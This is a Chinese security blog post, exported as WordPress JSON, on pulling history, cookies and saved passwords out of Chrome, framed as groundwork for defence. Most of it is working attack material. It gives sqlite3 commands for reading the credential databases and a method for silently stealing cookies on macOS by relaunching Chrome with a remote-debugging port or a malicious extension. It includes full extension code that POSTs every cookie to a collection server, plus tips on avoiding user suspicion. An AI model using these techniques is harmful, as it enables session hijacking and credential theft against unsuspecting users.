{"id":5333,"date":"2022-09-28T21:00:30","date_gmt":"2022-09-28T13:00:30","guid":{"rendered":"https:\/\/ixyzero.com\/blog\/?p=5333"},"modified":"2022-09-28T21:00:30","modified_gmt":"2022-09-28T13:00:30","slug":"chrome%e6%b5%8f%e8%a7%88%e5%99%a8%e4%bf%a1%e6%81%af%e7%9a%84%e6%94%b6%e9%9b%86","status":"publish","type":"post","link":"https:\/\/ixyzero.com\/blog\/archives\/5333.html","title":{"rendered":"Chrome\u6d4f\u89c8\u5668\u4fe1\u606f\u7684\u6536\u96c6"},"content":{"rendered":"\n<p>=Start=<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">\u7f18\u7531\uff1a<\/h4>\n\n\n\n<p>\u7b80\u5355\u6574\u7406\u4e00\u4e0b\u524d\u6bb5\u65f6\u95f4\u770b\u5230\u7684\u548c\u4f01\u4e1a\u5b89\u5168\u653b\u9632\u76f8\u5173\u7684\u5185\u5bb9\u3002\u8fd9\u6b21\u4e3b\u8981\u4ecb\u7ecdChrome\u6d4f\u89c8\u5668\u4e2d\u5b58\u50a8\u7684\u5bc6\u7801\u548ccookie\u7684\u5e38\u89c1\u83b7\u53d6\u65b9\u6cd5\uff0c\u65b9\u4fbf\u540e\u9762\u505a\u9632\u5fa1\u7b56\u7565\u7684\u65f6\u5019\u53c2\u8003\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">\u6b63\u6587\uff1a<\/h4>\n\n\n\n<h5 class=\"wp-block-heading\">\u53c2\u8003\u89e3\u7b54\uff1a<\/h5>\n\n\n\n<h5 class=\"wp-block-heading\">\u6d4f\u89c8\u5668\u5728\u4fe1\u606f\u6536\u96c6\u8fc7\u7a0b\u4e2d\u7684\u91cd\u8981\u6027<\/h5>\n\n\n\n<p>\u6d4f\u89c8\u5668\u53ef\u4ee5\u8ba4\u4e3a\u662f\u65b0\u65f6\u4ee3\u7684\u64cd\u4f5c\u7cfb\u7edf\uff0c\u627f\u8f7d\u4e86\u8d8a\u6765\u8d8a\u591a\u7684\u529f\u80fd\uff0c\u800c\u4e14\u73b0\u5728\u5f88\u591a\u516c\u53f8\u90fd\u5728\u5021\u5bfc\u5e73\u53f0\u5316\u3001\u7ebf\u4e0a\u5316\uff0c\u5c06\u539f\u6765\u5f88\u591a\u5728\u7ebf\u4e0b\u5b8c\u6210\u7684\u529f\u80fd\u5f80\u7ebf\u4e0a\u7cfb\u7edf\u8fc1\u79fb\uff0c\u6bd4\u5982\u5728\u7ebf\u6587\u6863\u7b49\u5e38\u7528\u7684\u529e\u516cOA\u7cfb\u7edf\u2026\u2026<strong>\u53ef\u4ee5\u7c97\u7565\u8ba4\u4e3a\u6d4f\u89c8\u5668\u662f\u516c\u53f8\u529e\u516c\u7684\u4e3b\u8981\u5165\u53e3<\/strong>\uff0c\u56e0\u6b64\u653b\u51fb\u8005\u5bf9\u4e8e\u6d4f\u89c8\u5668\u4fe1\u606f\u7684\u91cd\u70b9\u6536\u96c6\u4e5f\u5c31\u53ef\u4ee5\u7406\u89e3\u4e86\u3002<\/p>\n\n\n\n<p><strong>\u4ece\u6d4f\u89c8\u5668\u4e2d\u6211\u4eec\u53ef\u4ee5\u76f4\u63a5\u83b7\u53d6\u5458\u5de5\u7684\u5386\u53f2\u8bbf\u95ee\/\u4e0b\u8f7d\u8bb0\u5f55\u3001\u5e38\u7528\u4e66\u7b7e\u7b49\u4fe1\u606f\uff0c\u4ece\u800c\u4e86\u89e3\u5230\u5458\u5de5\u7684\u64cd\u4f5c\u4e60\u60ef\u3001\u5de5\u4f5c\u79cd\u7c7b\u3001\u76f8\u5173\u7684\u5185\u90e8\u5e38\u7528\u7cfb\u7edf\uff1b\u66f4\u8fdb\u4e00\u6b65\uff0c\u8fd8\u53ef\u4ee5\u5c1d\u8bd5\u83b7\u53d6\u6d4f\u89c8\u5668\u4e2d\u5df2\u4fdd\u5b58\u7684\u8d26\u53f7\u5bc6\u7801\uff0c\u7528\u4ee5\u767b\u5f55SSO\u4ece\u800c\u76f4\u63a5\u8bbf\u95ee\u516c\u53f8\u5185\u90e8\u7cfb\u7edf\u83b7\u53d6\u4fe1\u606f\uff0c\u6216\u8005\u5c1d\u8bd5\u83b7\u53d6\u5df2\u767b\u5f55\u7f51\u7ad9\u7684cookie\u6765\u76d7\u7528\u8be5\u5458\u5de5\u8d26\u53f7\u7684\u8eab\u4efd\u8fdb\u884c\u5185\u90e8\u7cfb\u7edf\u7684\u8bbf\u95ee\/\u64cd\u4f5c\u3002<\/strong><\/p>\n\n\n\n<p>Chrome\u6d4f\u89c8\u5668\u56e0\u4e3a\u5b83\u7684\u529f\u80fd\u6027\u548c\u5b89\u5168\u6027\u9010\u6e10\u6210\u4e3a\u4e86\u73b0\u5728\u7684\u4e3b\u6d41\u6d4f\u89c8\u5668\uff0c\u81ea\u7136\u800c\u7136\u7684\u4e5f\u5c31\u6210\u4e86\u653b\u51fb\u8005\u7684\u4e3b\u8981\u5173\u6ce8\u5bf9\u8c61\uff0c\u8fd9\u91cc\u4e5f\u4ee5Chrome\u6d4f\u89c8\u5668\u4e3a\u4f8b\u8fdb\u884c\u8bf4\u660e\u3002<\/p>\n\n\n\n<h5 class=\"wp-block-heading\">Windows\u548cmacOS\u5728\u83b7\u53d6Chrome\u6d4f\u89c8\u5668\u4fe1\u606f\u4e0a\u7684\u96be\u6613\u4e0d\u540c<\/h5>\n\n\n\n<ul class=\"wp-block-list\"><li><strong>\u5728 Windows \u7cfb\u7edf\u91cc\u83b7\u53d6Chrome\u6d4f\u89c8\u5668\u4e2d\u4fdd\u5b58\u7684\u8d26\u53f7\u5bc6\u7801\u548ccookie\u6bd4\u8f83\u5bb9\u6613\uff0c\u4e00\u822c\u76f4\u63a5\u7528\u7c7b\u4f3c HackBrowserData \u8fd9\u6837\u7684\u5de5\u5177\u5c31\u884c<\/strong>\uff0c\u4e3b\u8981\u662f\u56e0\u4e3a\u2014\u2014\u201c\u5728Windows\u4e0a\uff0c\u89e3\u5bc6\u9700\u8981\u7528\u5230\u7684secret key\u503c\u5b58\u50a8\u5728Profile Path\u4e0a\u7ea7\u8def\u5f84\u7684Local State\u6587\u4ef6\u4e2d\uff0c\u5b57\u6bb5encrypted_key\u4e3aAES\u7528\u5230\u7684key\u503c\u3002\u6574\u4e2a\u89e3\u5bc6\u8fc7\u7a0b\u65e0\u9700\u4efb\u4f55\u5bc6\u7801\uff0c\u53ea\u9700\u53ef\u4ee5\u8bbf\u95eeChrome\u6570\u636e\u6587\u4ef6\u4fbf\u53ef\u5b8c\u6210\u89e3\u5bc6\u3002\u201d<\/li><li>\u9ebb\u70e6\u7684\u662f macOS \u7cfb\u7edf\uff0c<strong>\u56e0\u4e3amacOS\u7cfb\u7edf\u7684\u5b89\u5168\u6027\u9650\u5236\uff0cGoogle Chrome \u7684\u5bc6\u94a5\u5b58\u50a8\u5728 Keychain \u91cc\u9762<\/strong>\uff0c\u5982\u679c\u4f60\u60f3\u83b7\u53d6\u660e\u6587\u5bc6\u7801\uff0c\u9700\u8981\u5148\u63d0\u4f9b\u5f53\u524d\u7535\u8111\u767b\u5f55\u7528\u6237\u7684\u5bc6\u7801\u6765\u4eceKeychain\u4e2d\u83b7\u53d6Chrome\u7684\u5bc6\u94a5\uff08\u4f1a\u5f39\u7a97\u63d0\u9192\uff0c\u9700\u8981\u7528\u6237\u4ea4\u4e92\uff09\uff1b\u5982\u679c\u9493\u9c7c\u8fc7\u7a0b\u4e2d\u51fa\u73b0\u7c7b\u4f3c\u5f39\u6846\u5f88\u53ef\u80fd\u4f1a\u5f15\u8d77\u7528\u6237\u7684\u8b66\u89c9\u4ece\u800c\u5bfc\u81f4\u9493\u9c7c\u5931\u8d25\uff0c\u6240\u4ee5\u5728macOS\u7cfb\u7edf\u4e0a\u4e00\u822c\u4f1a\u9009\u62e9\u901a\u8fc7\uff08\u4e0d\u5f39\u7a97\uff09\u83b7\u53d6cookie\u6765\u95f4\u63a5\u8fbe\u5230\u63a5\u7ba1\u7528\u6237\u8d26\u53f7\u7684\u76ee\u7684\u3002<\/li><\/ul>\n\n\n\n<h5 class=\"wp-block-heading\">\u8bbf\u95ee\u8bb0\u5f55\/\u4e66\u7b7e\/cookie\/\u8d26\u53f7\u5bc6\u7801\u6587\u4ef6\u67e5\u770b\u793a\u4f8b<\/h5>\n\n\n\n<p>Chrome\u7684\u6570\u636e\u6587\u4ef6\u5b58\u50a8\u8def\u5f84\u53ef\u4ee5\u901a\u8fc7\u5728\u641c\u7d22\u6846\u4e2d\u8f93\u5165 chrome:\/\/version \u770b\u5230\uff0c\u5176\u4e2d\u4e2a\u4eba\u8d44\u6599\u8def\u5f84 (Profile Path)\u5c31\u662f\u5b58\u50a8\u8def\u5f84\uff0c\u4e00\u822c\u662f ~\/Library\/Application Support\/Google\/Chrome\/Default\/ \u8fd9\u4e2a\u3002<\/p>\n\n\n\n<p>\u6b64\u8def\u5f84\u4e0b\u6709 History\/Bookmarks\/Cookies\/Login data \u8fd9\u56db\u4e2a\u6587\u4ef6\u7528\u6765\u5b58\u50a8\u5bf9\u5e94\u7684\u4fe1\u606f\uff08\u9664\u4e86 Bookmarks \u662f\u6587\u672c\u6587\u4ef6\u4e4b\u5916\uff0c\u53e6\u59163\u4e2a\u90fd\u662fSQLite\u6570\u636e\u5e93\u6587\u4ef6\uff09\uff0c<strong>\u62f7\u8d1d\u81f3\u5176\u5b83\u76ee\u5f55\u540e<\/strong>\u4f7f\u7528 sqlite3 \u547d\u4ee4\u6253\u5f00\u6570\u636e\u5e93\u6587\u4ef6\u5373\u53ef\u5b8c\u6210\u8868\u7ed3\u6784\u548c\u76f8\u5173\u4fe1\u606f\u7684\u67e5\u770b\u3002<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code># \u5982\u679c\u4e0d\u62f7\u8d1d\u76f4\u63a5\u67e5\u770b\u6253\u5f00\u6587\u4ef6\u4f1a\u63d0\u793a\u6570\u636e\u5e93\u5df2\u88ab\u9501\u5b9a\n$ cd ~\/Library\/Application\\ Support\/Google\/Chrome\/Default\n$ sqlite3 History\nSQLite version 3.37.0 2021-12-09 01:34:53\nEnter \".help\" for usage hints.\nsqlite&gt; .tables\nError: database is locked\nsqlite&gt;\n\n\n# \u5c06\u6587\u4ef6\u62f7\u8d1d\u81f3\u5f53\u524d\u76ee\u5f55\u8fdb\u884c\u67e5\u770b\n$ cp ~\/Library\/Application\\ Support\/Google\/Chrome\/Default\/{History,Bookmarks,Cookies,Login\\ Data} .\n\n# \u5386\u53f2\u8bbf\u95ee\u8bb0\u5f55\u662f\u6ca1\u6709\u52a0\u5bc6\u7684\uff0c\u53ef\u4ee5\u7528sqlite\u547d\u4ee4\u8fdb\u884c\u67e5\u770b urls \u8868\n$ sqlite3 History\nsqlite&gt; .tables\nclusters                 downloads_slices         typed_url_sync_metadata\nclusters_and_visits      downloads_url_chains     urls\ncontent_annotations      keyword_search_terms     visit_source\ncontext_annotations      meta                     visits\ndownloads                segment_usage\ndownloads_reroute_info   segments\nsqlite&gt; .schema urls\nsqlite&gt; select * from urls order by id desc limit 10;\n-- \u6ce8\u610f\u8868\u5b57\u6bb5 last_visit_time \u4e0d\u662f\u5e38\u89c1\u7684\u90a3\u79cd unix timestamp \u53d6\u503c\uff0c\u9700\u8981\u7b80\u5355\u5904\u7406\u4e00\u4e0b\u4e4b\u540e\u624d\u80fd\u62ff\u5230\u5bf9\u4eba\u53ef\u8bfb\u7684\u65e5\u671f\u65f6\u95f4\u4fe1\u606f\nsqlite&gt; SELECT datetime(last_visit_time\/1000000-11644473600, \"unixepoch\") as last_visited, url, title, visit_count FROM urls order by id desc limit 10;\n\n\n# \u4e66\u7b7e\u662f\u6587\u672c\u6587\u4ef6\uff0c\u4e5f\u53ef\u4ee5\u76f4\u63a5\u67e5\u770b\n$ cat Bookmarks | head\n$ cat Bookmarks | grep -A2 '\"name\"'\n\n\n# cookie\u4fe1\u606f\u7684key\u662f\u660e\u6587\uff0c\u4f46\u662f\u5bf9\u5e94\u7684value\u662f\u52a0\u5bc6\u5b58\u653e\u5728 cookies \u8868\u4e2d\u7684 encrypted_value \u5b57\u6bb5\u4e2d\uff0c\u9700\u8981\u5bc6\u7801\u6309\u89c4\u8303\u8fdb\u884c\u89e3\u5bc6\u624d\u80fd\u62ff\u5230\u660e\u6587\u5185\u5bb9\n$ sqlite3 Cookies\nsqlite&gt; .tables\ncookies  meta\nsqlite&gt; .schema meta\nCREATE TABLE meta(key LONGVARCHAR NOT NULL UNIQUE PRIMARY KEY, value LONGVARCHAR);\nsqlite&gt; .schema cookies\nCREATE TABLE cookies(creation_utc INTEGER NOT NULL,host_key TEXT NOT NULL,top_frame_site_key TEXT NOT NULL,name TEXT NOT NULL,value TEXT NOT NULL,encrypted_value BLOB NOT NULL,path TEXT NOT NULL,expires_utc INTEGER NOT NULL,is_secure INTEGER NOT NULL,is_httponly INTEGER NOT NULL,last_access_utc INTEGER NOT NULL,has_expires INTEGER NOT NULL,is_persistent INTEGER NOT NULL,priority INTEGER NOT NULL,samesite INTEGER NOT NULL,source_scheme INTEGER NOT NULL,source_port INTEGER NOT NULL,is_same_party INTEGER NOT NULL,last_update_utc INTEGER NOT NULL);\nCREATE UNIQUE INDEX cookies_unique_index ON cookies(host_key, top_frame_site_key, name, path);\nsqlite&gt;\nsqlite&gt; select count(1) as cnt from cookies;\nsqlite&gt; select * from cookies limit 5;\n\n\n# \u8d26\u53f7\u5bc6\u7801\u4fe1\u606f\u4e2d\u7684\u5bc6\u7801\u662f\u52a0\u5bc6\u5b58\u653e\u5728 logins \u8868\u4e2d\u7684 password_value \u5b57\u6bb5\u4e2d\uff0c\u9700\u8981\u5bc6\u7801\u6309\u89c4\u8303\u8fdb\u884c\u89e3\u5bc6\u624d\u80fd\u62ff\u5230\u660e\u6587\u5185\u5bb9\n$ sqlite3 Login\\ Data\nsqlite&gt; .tables\nfield_info              meta                    sync_entities_metadata\ninsecure_credentials    password_notes          sync_model_metadata\nlogins                  stats\nsqlite&gt; .schema logins\nCREATE TABLE IF NOT EXISTS \"logins\" (origin_url VARCHAR NOT NULL, action_url VARCHAR, username_element VARCHAR, username_value VARCHAR, password_element VARCHAR, password_value BLOB, submit_element VARCHAR, signon_realm VARCHAR NOT NULL, date_created INTEGER NOT NULL, blacklisted_by_user INTEGER NOT NULL, scheme INTEGER NOT NULL, password_type INTEGER, times_used INTEGER, form_data BLOB, display_name VARCHAR, icon_url VARCHAR, federation_url VARCHAR, skip_zero_click INTEGER, generation_upload_status INTEGER, possible_username_pairs BLOB, id INTEGER PRIMARY KEY AUTOINCREMENT, date_last_used INTEGER NOT NULL DEFAULT 0, moving_blocked_for BLOB, date_password_modified INTEGER NOT NULL DEFAULT 0, UNIQUE (origin_url, username_element, username_value, password_element, signon_realm));\nCREATE INDEX logins_signon ON logins (signon_realm);\nsqlite&gt; select count(1) as cnt from logins;\nsqlite&gt; select * from logins limit 5;\n\n\n# \u5177\u4f53\u7684\u89e3\u5bc6\u903b\u8f91\u53ef\u4ee5\u53c2\u8003 HackBrowserData \u4e2d\u7684\u4ee3\u7801\uff0c\u7406\u8bba\u4e0a\u73b0\u5728 win\/mac \u7684\u4e3b\u8981\u533a\u522b\u5c31\u5728\u4e8e\u83b7\u53d6\u83b7\u53d6\u89e3\u5bc6\u5bc6\u94a5\u65b9\u6cd5\u7684\u4e0d\u540c\u2014\u2014win\u7cfb\u7edf\u4e0a\u89e3\u5bc6\u5bc6\u94a5\u76f4\u63a5\u5b58\u5728\u672c\u5730\u6587\u4ef6\u4e2d\uff0c\u901a\u8fc7\u8c03\u53d6\u76f8\u5173\u7cfb\u7edfAPI\u5373\u53ef\u81ea\u52a8\u5b8c\u6210\u89e3\u5bc6\uff1bmac\u7cfb\u7edf\u4e0a\u89e3\u5bc6\u5bc6\u94a5\u5b58\u5728Keychain\u4e2d\uff0c\u9700\u8981\u7528\u6237\u4e3b\u52a8\u8f93\u5165\u6b63\u786e\u7684\u7535\u8111\u5bc6\u7801\u4e4b\u540e\u624d\u80fd\u62ff\u5230\u89e3\u5bc6\u5bc6\u94a5\uff0c\u518d\u6765\u5b8c\u6210\u540e\u9762\u7684\u89e3\u5bc6\u6b65\u9aa4\uff0c\u8fc7\u7a0b\u4e2d\u9700\u8981\u7528\u6237\u4ea4\u4e92\u3002<\/code><\/pre>\n\n\n\n<h5 class=\"wp-block-heading\">macOS\u7cfb\u7edf\u4e0a\u9759\u9ed8\u83b7\u53d6\u6d4f\u89c8\u5668cookie\u7684\u601d\u8def\u9a8c\u8bc1<\/h5>\n\n\n\n<p><strong>\u7ecf\u8fc7\u5b9e\u9645\u6d4b\u8bd5\u53d1\u73b0\u4e0b\u97622\u79cd\u65b9\u5f0f\u90fd\u53ef\u4ee5\u5b9e\u73b0cookie\u7684\u83b7\u53d6<\/strong>\uff0c\u5177\u4f53\u9009\u62e9\u54ea\u79cd\u65b9\u5f0f\u53ef\u4ee5\u6309\u9700\u9009\u62e9\uff08\u4e0d\u8fc7\u5c31\u6211\u4e2a\u4eba\u6765\u770b\uff0c\u52a0\u8f7d\u63d2\u4ef6\u8fd9\u4e2a\u76f8\u5bf9\u6765\u8bf4\u7b80\u6613\u5feb\u901f\u4e00\u70b9\uff09\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>\u5982\u82e5Chrome\u5df2\u542f\u52a8\uff0c\u9700\u5148\u505c\u7528\u6b63\u5728\u8fd0\u884c\u7684Chrome\uff0c\u7136\u540e\u901a\u8fc7\u542f\u52a8\u65f6\u52a0\u8f7d\u6076\u610fChrome\u63d2\u4ef6\uff08load-extension\uff09\u6765\u83b7\u53d6cookie<\/li><li>\u5982\u82e5Chrome\u5df2\u542f\u52a8\uff0c\u9700\u5148\u505c\u7528\u6b63\u5728\u8fd0\u884c\u7684Chrome\uff0c\u7136\u540e\u5229\u7528\u542f\u52a8\u65f6\u5f00\u542fChrome\u7684\u8fdc\u7a0b\u8c03\u8bd5\u529f\u80fd\uff08remote-debugging-port\uff09\uff0c\u901a\u8fc7\u8c03\u8bd5\u63a5\u53e3\u6765\u83b7\u53d6\u6240\u6709\u7684cookie<\/li><\/ul>\n\n\n\n<pre class=\"wp-block-code\"><code># \u505c\u7528\u6b63\u5728\u8fd0\u884c\u7684Chrome\nkillall \"Google Chrome\"\n\n# \u8bf4\u660e\uff1a\u4e0d\u8bba\u662f\u601d\u8def1\u8fd8\u662f\u601d\u8def2\u5728\u4e0d\u4f7f\u7528 --user-data-dir \u9009\u9879\u7684\u60c5\u51b5\u4e0b\u90fd\u53ef\u4ee5\u6210\u529f\uff0c\u6d4b\u8bd5\u7684Chrome\u7248\u672c\u662f\u5f53\u524d\u7684\u6700\u65b0\u7248\u672c 105.0.5195.125\n\n# \u601d\u8def1\uff1a\u52a0\u8f7d\u63d2\u4ef6\u7684\u65b9\u5f0f\n# \u5728\u542f\u52a8\u4e4b\u540e\u5f53\u524d\u6d4f\u89c8\u5668\u4e2d\u7684\u6240\u6709cookie\u7acb\u5373\u4e00\u6b21\u6027\u7684\u5c31\u53d1\u9001\u5230\u4e86\u8fdc\u7aef\n# \u51fa\u4e8e\u9690\u853d\u8d77\u89c1\uff0c\u53ef\u4ee5\u8003\u8651\u670d\u52a1\u7aef\u63a5\u6536\u5230\u4e86\u6570\u636e\u4e4b\u540e\u7acb\u5373\u5c06\u591a\u7684\u547d\u4ee4\u884c\u53c2\u6570\u53bb\u6389\n# \u7136\u540e\u7528\u65e0\u53c2\u6570\u7684\u547d\u4ee4\u8fdb\u884c\u542f\u52a8\uff0c\u6216\u662f\u52a0\u4e0a restore-last-session \u53c2\u6570\u4e5f\u884c\nterminal1&gt; python py_flask_server.py\n\nterminal2&gt; \/Applications\/Google\\ Chrome.app\/Contents\/MacOS\/Google\\ Chrome --load-extension=.\/chrome_get_cookie\n\n\n# \u601d\u8def2\uff1a\u4f7f\u7528\u8fdc\u7a0b\u8c03\u8bd5\u7684\u65b9\u5f0f\nterminal1&gt; \/Applications\/Google\\ Chrome.app\/Contents\/MacOS\/Google\\ Chrome --remote-debugging-port=9099\n\nterminal2&gt; curl -s 127.0.0.1:9099\/json\nterminal2&gt; curl -s 127.0.0.1:9099\/json | grep -A2 '\"url\"'\nterminal2&gt; websocat ws:\/\/127.0.0.1:9099\/devtools\/page\/xxxxxxx\nws&gt; {\"id\": 1, \"method\": \"Network.getCookie\"}\nws&gt; {\"id\": 1, \"method\": \"Network.getAllCookies\"}\n\n\n# Chrome\u6d4f\u89c8\u5668\u547d\u4ee4\u884c\u76f8\u5173\u53c2\u6570\n\u8bf4\u660e\uff1aChrome\u7684\u7edd\u5927\u591a\u6570\u547d\u4ee4\u884c\u53c2\u6570\u53ea\u6709\u5728\u6240\u6709\u7684Chrome\u8fdb\u7a0b\u90fd\u505c\u6b62\u540e\uff0c\u518d\u542f\u52a8\u65f6\u6307\u5b9a\u624d\u4f1a\u751f\u6548\u3002\n(Most of the command-line flags are only effective when all existing instances of Chrome that corresponds to the chrome profile have been terminated.)\n\n--restore-last-session \u6d4f\u89c8\u5668\u5d29\u6e83\u540e\uff0c\u4f7f\u7528\u6b64\u9009\u9879\u6062\u590d\u6d4f\u89c8\u5668\u6700\u8fd1\u6d4f\u89c8\u7684\u9009\u9879\u5361\uff08\u8fd9\u4e2a\u9009\u9879\u5bf9\u4e8ekillall\u65b9\u5f0f\u6740\u6389\u7684Chrome\u8fd8\u662f\u5f88\u6709\u7528\u7684\uff0c\u5426\u5219\u5bb9\u6613\u5f15\u8d77\u6ce8\u610f\uff09\n\n--load-extension \u6307\u5b9a\u8981\u52a0\u8f7d\u7684Chrome\u63d2\u4ef6\u6587\u4ef6\u5939\u8def\u5f84\n\n--remote-debugging-port=9099 \u6307\u5b9a\u8fdc\u7a0b\u8c03\u8bd5\u7684\u7aef\u53e3\n\n--user-data-dir \u6307\u5b9a\u8981\u52a0\u8f7d\u7684\u7528\u6237\u6d4f\u89c8\u5668\u6570\u636e\u6587\u4ef6\u5939\uff08\u5b9e\u6d4b\u53d1\u73b0\u4e0d\u6307\u5b9a\u7684\u60c5\u51b5\u4e0b\u662f\u5e38\u89c4\u7684\u90a3\u79cd\uff0c\u6307\u5b9a\u4e86\u53cd\u800c\u662f\u65b0\u7684\u7a7a\u767d\u9875\u9762\uff09\n\n\n# chrome_get_cookie\u63d2\u4ef6\u7684\u76ee\u5f55\u7ed3\u6784\u793a\u4f8b\nchrome_get_cookie\n\u251c\u2500\u2500 getcookie.js #\u540e\u53f0\u811a\u672c\n\u251c\u2500\u2500 manifest.json #\u6e05\u5355\u6587\u4ef6\n\u2514\u2500\u2500 popup.html #popup\u9875\u9762\n\n## chrome_get_cookie -&gt; manifest.json\n## \u7528\u4e8e\u6307\u5b9a\u540e\u53f0\u811a\u672c\u7684\u540d\u79f0\uff0c\u5e76\u505a\u6743\u9650\u8bf4\u660e\n{\n  \"name\": \"getCookie\",\n  \"manifest_version\": 2,\n  \"version\": \"1.0\",\n  \"description\": \"getCookie \u6269\u5c55\u7a0b\u5e8f\",\n  \"browser_action\": {\n    \"default_popup\": \"popup.html\"\n  },\n  \"background\": {\n    \"scripts\": &#91;\"getcookie.js\"],\n    \"persistent\": false\n  },\n  \"permissions\": &#91;\n    \"https:\/\/*\/*\",\n    \"http:\/\/*\/*\",\n    \"cookies\"\n  ]\n}\n\n## chrome_get_cookie -&gt; getcookie.js\n## \u7528\u4e8e\u53d6cookie\u7684\u76f8\u5173\u5b57\u6bb5\u5e76\u5c06\u6574\u7406\u540e\u7684\u5185\u5bb9\u901a\u8fc7HTTP POST\u5230\u8fdc\u7aef\u670d\u52a1\u5668\nchrome.cookies.getAll({}, function (cks){\n    var result = Array();\n    cks.forEach(function(ck){\n        var m_ck = {};\n        m_ck&#91;\"domain\"] = ck.domain\n        m_ck&#91;\"name\"] = ck.name;\n        m_ck&#91;\"value\"] = ck.value;\n        m_ck&#91;\"hostOnly\"] = ck.hostOnly;\n        m_ck&#91;\"path\"] = ck.path;\n        result.push(m_ck);\n    });\n    (function(data){\n        var url = 'http:\/\/127.0.0.1:9999\/';\n        fetch(url, {\n                method: 'POST',\n                body: JSON.stringify(data),\n                headers: new Headers({\n                    'Content-Type': 'application\/json'\n                })\n        });\n    }(result));\n});<\/code><\/pre>\n\n\n\n<h5 class=\"wp-block-heading\">\u53c2\u8003\u94fe\u63a5\uff1a<\/h5>\n\n\n\n<p>HackBrowserdata\uff0c\u7ed5\u8fc7\u9a8c\u8bc1\u83b7\u53d6\u6d4f\u89c8\u5668\u5bc6\u7801\u548c\u5386\u53f2\u8bb0\u5f55\u7684\u5de5\u5177<br><a href=\"https:\/\/www.isharepc.com\/28240.html\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/www.isharepc.com\/28240.html<\/a><\/p>\n\n\n\n<p>HackBrowserData \u4e00\u6b3e\u53ef\u5168\u5e73\u53f0\u8fd0\u884c\u7684\u6d4f\u89c8\u5668\u6570\u636e\u5bfc\u51fa\u89e3\u5bc6\u5de5\u5177\u3002<br><a href=\"https:\/\/github.com\/moonD4rk\/HackBrowserData\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/github.com\/moonD4rk\/HackBrowserData<\/a><\/p>\n\n\n\n<p>BrowserGhost \u4e00\u4e2a\u6293\u53d6\u6d4f\u89c8\u5668\u5bc6\u7801\u7684\u5de5\u5177 #Windows<br><a href=\"https:\/\/github.com\/QAX-A-Team\/BrowserGhost\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/github.com\/QAX-A-Team\/BrowserGhost<\/a><\/p>\n\n\n\n<p><strong>mac\u4e0b\u7684\u6d4f\u89c8\u5668cookie\u76d7\u53d6<\/strong><br><a href=\"https:\/\/mp.weixin.qq.com\/s\/2vPua1Tqvi4ffUEoP7OwUQ\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/mp.weixin.qq.com\/s\/2vPua1Tqvi4ffUEoP7OwUQ<\/a><\/p>\n\n\n\n<p>mac\u6d4f\u89c8\u5668\u5bc6\u7801\u83b7\u53d6\u96be\uff1f\u6559\u4f60\u4e24\u79cd\u65b9\u6cd5\uff0c\u8f7b\u677e\u641e\u5b9a<br><a href=\"https:\/\/zhuanlan.zhihu.com\/p\/499379236\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/zhuanlan.zhihu.com\/p\/499379236<\/a><\/p>\n\n\n\n<p>MacOS\u4e0b\u65e0\u5bc6\u7801dump chrome cookie<br><a href=\"https:\/\/saucer-man.com\/information_security\/787.html\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/saucer-man.com\/information_security\/787.html<\/a><\/p>\n\n\n\n<p>Command-line client for WebSockets<br><a href=\"https:\/\/github.com\/vi\/websocat\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/github.com\/vi\/websocat<\/a><\/p>\n\n\n\n<p>chrome_get_cookie: \u5229\u7528chrome\u6269\u5c55 dump \u6d4f\u89c8\u5668cookie<br><a href=\"https:\/\/github.com\/saucer-man\/chrome_get_cookie\/blob\/master\/getcookie.js\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/github.com\/saucer-man\/chrome_get_cookie\/blob\/master\/getcookie.js<\/a><\/p>\n\n\n\n<p>chrome.cookies<br><a href=\"https:\/\/developer.chrome.com\/docs\/extensions\/reference\/cookies\/\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/developer.chrome.com\/docs\/extensions\/reference\/cookies\/<\/a><\/p>\n\n\n\n<p>chrome-extensions-samples\/ cookie-clearer\/<br><a href=\"https:\/\/github.com\/GoogleChrome\/chrome-extensions-samples\/tree\/main\/api\/cookies\/cookie-clearer\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/github.com\/GoogleChrome\/chrome-extensions-samples\/tree\/main\/api\/cookies\/cookie-clearer<\/a><\/p>\n\n\n\n<p>\u6e17\u900f\u6280\u5de7\u2014\u2014\u79bb\u7ebf\u5bfc\u51faChrome\u6d4f\u89c8\u5668\u4e2d\u4fdd\u5b58\u7684\u5bc6\u7801<br><a href=\"https:\/\/3gstudent.github.io\/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-%E7%A6%BB%E7%BA%BF%E5%AF%BC%E5%87%BAChrome%E6%B5%8F%E8%A7%88%E5%99%A8%E4%B8%AD%E4%BF%9D%E5%AD%98%E7%9A%84%E5%AF%86%E7%A0%81\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/3gstudent.github.io\/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-%E7%A6%BB%E7%BA%BF%E5%AF%BC%E5%87%BAChrome%E6%B5%8F%E8%A7%88%E5%99%A8%E4%B8%AD%E4%BF%9D%E5%AD%98%E7%9A%84%E5%AF%86%E7%A0%81<\/a><\/p>\n\n\n\n<p>\u6e17\u900f\u6280\u5de7\u2014\u2014\u5bfc\u51faChrome\u6d4f\u89c8\u5668\u4e2d\u4fdd\u5b58\u7684\u5bc6\u7801<br><a href=\"https:\/\/3gstudent.github.io\/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-%E5%AF%BC%E5%87%BAChrome%E6%B5%8F%E8%A7%88%E5%99%A8%E4%B8%AD%E4%BF%9D%E5%AD%98%E7%9A%84%E5%AF%86%E7%A0%81\" target=\"_blank\" rel=\"noreferrer 